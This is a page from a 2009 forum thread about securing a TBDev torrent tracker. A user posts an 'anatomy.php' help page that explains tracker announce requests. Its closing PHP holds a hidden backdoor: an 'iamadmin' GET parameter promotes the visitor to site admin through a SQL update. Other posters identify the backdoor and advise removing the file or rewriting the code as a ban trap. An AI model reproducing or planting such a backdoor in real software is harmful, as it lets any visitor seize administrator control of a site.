Bravo List
Page 2 of 3 1 2 3
Show 40 post(s) from this thread on one page

Bravo List (http://www.bvlist.com/index.php)
-   TBDev (http://www.bvlist.com/forumdisplay.php?f=20)
-   -   security (http://www.bvlist.com/showthread.php?t=3100)

tunad 28th July 2009 18:45
PHP Code:
<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>


There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started</code>

Let's dissect this:

• <b>info_hash</b> is just the hash identifying the torrent in question;
• <b>peer_id</b>, as the name suggests, identifies the client (the s588 part identifies Shad0w's 5.8.8, the rest is random);
• <b>port</b> just tells the tracker which port the client will listen to for incoming connections;
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)
• <b>downloaded</b>=0;
• <b>left</b>=753690875 (how much left); 
• <b>event=started</b> (telling the tracker that the client has just started).

Notice that the client IP doesn't show up here (although it can be sent by the client if it configured to do so).
It's up to the tracker to see it and associate it with the user_id.
(Server replies will be omitted, they're just lists of peer ips and respective ports.)
At this stage the user's profile will be listing this torrent as being leeched.

>From now on the client will keep send GETs to the tracker. We show only the first one as an example,


<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928& left=715417851&numwant=0</code>

("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)


As you can see at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depends on the client and tracker) or when you force a manual announce in the client.


Finally, when the client was closed it sent


<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163 &left=0&numwant=0&event=completed</code>

Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0). 

There's a further message that causes the torrent to be removed from the user's profile,
namely"event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's. 

One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often, it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)

</td></tr></table>
</td></tr></table>

<?
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print("Your class now is 0 :(");
                }
stdfoot();
?>
this is my anatomy.php

wMan 28th July 2009 18:57
Quote:
Originally Posted by tunad (Post 13804)
this is my anatomy.php
ban users with white usernames and change anatomy.php with this
[php] if (eregi("anatomy.php",$_SERVER["PHP_SELF"])) die ("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>

Anatomy of a torrent session



(Updated to reflect the tracker changes. 14-04-2004)



There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:



GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9% BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started



Let's dissect this:

3v0 28th July 2009 19:01
Just remove anatomy.php it really isnt needed.

sammygo 28th July 2009 19:02
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Your class now is 0 :(");
                } 

change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                } 

tunad 28th July 2009 19:03
thank you very much!!!!!

i hope this is all i have to do.

wMan 28th July 2009 19:09
Quote:
Originally Posted by ionutzsami (Post 13808)
change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                              mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                } 
u still can hack it while shit like $_GET["iamadmin"] is in somewhere
either u remove anathomy ore change it to one without this crap

tunad 28th July 2009 19:18
so al i have to do is to delete anatomy.php ok?

wMan 28th July 2009 19:19
Quote:
Originally Posted by tunad (Post 13811)
so al i have to do is to delete anatomy.php ok?
yes

tunad 28th July 2009 19:27
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??

wMan 28th July 2009 19:35
Quote:
Originally Posted by tunad (Post 13813)
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
because u use source that had backdoor in it
do u realy think u will get it to work ?

there is so many other good sources u know


All times are GMT +2. The time now is 07:07.
Page 2 of 3 1 2 3
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.